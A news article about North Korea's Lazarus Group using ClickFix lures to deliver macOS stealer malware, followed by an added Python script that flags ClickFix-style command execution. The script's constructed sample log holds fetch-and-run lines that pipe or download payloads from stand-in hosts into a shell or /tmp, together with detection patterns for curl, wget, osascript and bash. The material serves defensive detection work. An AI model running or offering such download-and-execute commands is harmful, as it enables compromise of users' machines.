North Korea's Lazarus Targets macOS Users via ClickFix
Recorded: May 11, 2026, 1:16 p.m.
Original
Lazarus continues leveraging ClickFix for initial access and data theft: in this case, against Mac-centric organizations and their high-value leaders.

Alexander Culafi, Senior News Writer, Dark Reading
April 24, 2026
4 Min Read
Source: Alexey Stiop via Alamy Stock Photo

North Korea's Lazarus Group is using ClickFix attacks to deliver novel macOS malware.

That's according to security vendor Any.Run, which on April 21 published research on a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks targeting organizations and distributing a range of malware. This latest research focuses primarily on a newly identified macOS malware kit currently being leveraged in the wild.

ClickFix is a social engineering technique that rose to prominence over the past year or so. A threat actor tricks the victim into visiting attacker-operated infrastructure, such as a website masquerading as a Zoom meeting page. When the victim reaches the Web page, they are told there are technical issues that can only be resolved by updating their software. The attacker usually instructs the victim to run malicious code, either by copying and pasting a run command (on Windows) or by downloading and opening a file containing the code (typically on macOS).

ClickFix has lately been a favorite tactic of North Korean threat actors. Entities like Lazarus Group use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or conducting espionage. In this latest campaign, Lazarus Group is targeting FinTech and cryptocurrency organizations, as well as high-value leaders in organizations that rely substantially on macOS devices.

The Complete macOS Malware Attack Chain

According to Eldritch, an attacker contacts a business leader through Telegram, often using a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure.

The target joins the call and is prompted to enter a command to fix connection issues. Because the command is entered by the user, many traditional security controls are never triggered. And because users are conditioned to agree to actions like updating software, techniques like ClickFix may raise fewer red flags for the user than a traditional phishing email, especially when the attacker has used a business meeting to lower the target's guard ahead of time.

Then, "the operation is focused on extracting business value as quickly as possible," the blog post reads. "The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data." Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added.

Once the user enters the command and connects to attacker infrastructure, malware is downloaded as a macOS application .bin file under an unassuming name, like "teamsSDK.bin." This application installs the second-stage binary and includes additional ways of gaining the user's trust, such as a message saying the software has been updated. The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. This is followed by a persistence mechanism that re-invokes the malware kit at every login, before the primary component, a stealer named "macrasv2," is loaded. The stealer stages previously collected data, including browser extension data, stored browser credentials and cookies, and macOS Keychain entries, consolidates it into a temporary directory, and exfiltrates it through Telegram. Macrasv2 then runs a self-deletion script, and the infection chain is complete.

While many North Korean state-sponsored attacks are sophisticated, Eldritch noted that macrasv2 is "badly written." Several components remain either unimplemented or incorrectly implemented, while some enter "infinite loops that may expose its presence due to system resource starvation." The malware also exhibits multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with missing authentication.

How to Avoid ClickFix Compromise

Any.Run's blog contains indicators of compromise, but no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file. As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it succeeds, and to instruct them never to run suspicious commands or open files as a way to solve connectivity problems. Aleksey Lapshin, CEO of Any.Run, tells Dark Reading that Mac users in particular should be trained out of the illusion of safety many of them hold, based on a history of being told "Macs don't get malware."

Organizations should also actively track ClickFix samples in the wild and feed the actual commands back into EDR rules and execution policies. Finally, log and restrict high-risk commands on endpoints, such as curl, wget, osascript, and bash; Lapshin says many organizations don't monitor this at all, especially on macOS.

"Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security, such as email gateways, EDR, perimeter filtering, gets more expensive every year, so they're picking new paths," Lapshin says. "And the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine."
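The "log and restrict high-risk commands" advice above, turned into detection logic, as an added defender-side example that is not part of the Dark Reading article or of Any.Run's research. It runs a small rule set over process-execution records and flags the ClickFix patterns the article describes: a download piped straight into a shell, a .bin payload fetched into a temporary directory and then executed, inline AppleScript used for the "software updated" reassurance, and curl/wget/osascript/bash launched directly under a user-facing application. The tab-separated record format, the example.invalid host names, the file names and the user names are all constructed for illustration; an EDR export would need its own parser.

```python
"""Flag ClickFix-style command execution in macOS process-event records.

Added example: constructed log format and sample data, not Any.Run's tooling.
Each record is "<ISO time>\t<user>\t<parent process>\t<command line>".
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Binaries the article singles out as worth logging and restricting on macOS.
HIGH_RISK_BINARIES = {"curl", "wget", "osascript", "bash", "sh", "zsh"}

# Parents under which a user would paste a "fix" command. A downloader or
# shell spawned directly here means a person ran it, which is the ClickFix
# signature the article describes (constructed list; tune per environment).
USER_FACING_PARENTS = {"Terminal", "iTerm2", "Telegram", "Safari", "Google Chrome", "zoom.us"}


@dataclass
class Event:
    ts: str
    user: str
    parent: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    severity: str  # "high" | "medium" | "low"
    event: Event


def parse_event(line: str) -> Optional[Event]:
    """Parse one constructed record; return None for malformed lines."""
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4 or not parts[3].strip():
        return None
    return Event(*parts)


def argv0(cmdline: str) -> str:
    tokens = cmdline.split()
    return tokens[0] if tokens else ""


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


# Download whose output is piped into a shell ("curl ... | bash").
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# osascript with an inline script rather than a file argument.
INLINE_APPLESCRIPT = re.compile(r"\bosascript\b.*\s-e\s")
# A dropped file in /tmp being marked executable.
CHMOD_IN_TMP = re.compile(r"\bchmod\s+\+x\s+(/private)?/tmp/")
# Program image executed out of a temp or download directory.
TEMP_EXEC = re.compile(r"^(/private)?/tmp/|^/Users/[^/]+/Downloads/")


def evaluate(event: Event) -> list[Finding]:
    """Apply every rule to one event; a record can hit several rules."""
    hits: list[Finding] = []
    cmd = event.cmdline
    if PIPE_TO_SHELL.search(cmd):
        hits.append(Finding("download_piped_to_shell", "high", event))
    elif DOWNLOADER.search(cmd) and ("/tmp/" in cmd or ".bin" in cmd):
        hits.append(Finding("download_to_tmp_or_bin", "high", event))
    if TEMP_EXEC.search(argv0(cmd)):
        hits.append(Finding("payload_executed_from_tmp", "high", event))
    if CHMOD_IN_TMP.search(cmd):
        hits.append(Finding("chmod_executable_in_tmp", "medium", event))
    if INLINE_APPLESCRIPT.search(cmd):
        hits.append(Finding("inline_applescript", "medium", event))
    # The "log" half of "log and restrict": visibility on any high-risk
    # binary a user launches, even when no stronger rule fires.
    if basename(argv0(cmd)) in HIGH_RISK_BINARIES and event.parent in USER_FACING_PARENTS:
        hits.append(Finding("user_ran_high_risk_binary", "low", event))
    return hits


def scan(lines) -> list[Finding]:
    findings: list[Finding] = []
    for line in lines:
        event = parse_event(line)
        if event is not None:
            findings.extend(evaluate(event))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts = {"high": 0, "medium": 0, "low": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


# Constructed sample records mirroring the chain in the article, plus benign
# developer activity that a rule set must not drown in.
SAMPLE_LOG = "\n".join([
    "2026-04-20T14:02:11Z\tcfo\tTerminal\tcurl -fsSL https://meet-fix.example.invalid/teamsSDK.bin -o /tmp/teamsSDK.bin",
    "2026-04-20T14:02:12Z\tcfo\tTerminal\tchmod +x /tmp/teamsSDK.bin",
    "2026-04-20T14:02:13Z\tcfo\tTerminal\t/tmp/teamsSDK.bin",
    "2026-04-20T14:02:20Z\tcfo\tteamsSDK.bin\tosascript -e 'display dialog \"Teams SDK updated\"'",
    "2026-04-20T14:05:00Z\tcfo\tTerminal\tcurl -fsSL https://zoom-connect.example.invalid/fix | bash",
    "2026-04-20T14:10:00Z\tdev\tTerminal\tcurl -sS https://api.github.com/repos/x/y/releases -o releases.json",
    "2026-04-20T14:11:00Z\tdev\tXcode\tbash build.sh",
    "2026-04-20T14:12:00Z\tdev\tTerminal\tgit status",
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.severity:6} {f.rule:28} {f.event.user}@{f.event.parent}: {f.event.cmdline}")
    print(summarize(scan(SAMPLE_LOG.splitlines())))
```

The high-severity rules are the ones worth feeding back into EDR blocking or execution policies; the low-severity rule only records that a person launched one of the listed binaries, which is the visibility Lapshin says most organizations lack on macOS. Expect legitimate curl-to-/tmp and chmod usage from developers, so an allowlist by user or parent process belongs in front of any blocking action.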
Summarized

North Korea's Lazarus Group is currently deploying a novel macOS malware campaign that uses the ClickFix social engineering technique, as detailed by Any.Run in April 2026. The operation targets Mac-centric organizations and prominent leadership figures, using fake technical-support prompts disguised as Zoom, Microsoft Teams, or Google Meet invitations to gain initial access. The core of the attack is tricking victims into executing malicious code, often a disguised application such as "teamsSDK.bin," which installs a system profiler that connects to a command-and-control (C2) server. The chain adds a persistence mechanism and a stealer named "macrasv2" that exfiltrates sensitive data, including credentials, browser sessions, macOS Keychain entries, and system information. According to offensive security expert Mauro Eldritch, the malware is surprisingly poorly coded, with incorrectly implemented components and resource-intensive loops that can reveal its presence. The lures impersonate business opportunities or job offers to lower user defenses, and the group's objectives center on acquiring cryptocurrency or intellectual property, or conducting espionage. Any.Run emphasizes that the success of ClickFix hinges on user action, specifically the execution of suspicious commands, which highlights the need for robust employee training and vigilance against these deceptive tactics. Aleksey Lapshin, CEO of Any.Run, stresses that attackers are prioritizing the cheapest, most effective entry points into organizations, frequently bypassing traditional security measures like email gateways and endpoint detection and response (EDR) systems, and points out that user-driven command execution is currently the least defended area. Lapshin advocates careful monitoring of suspicious commands, particularly those involving curl, wget, osascript, and bash, and restricting their use on macOS devices, recognizing this as a key vulnerability exploited by the Lazarus Group.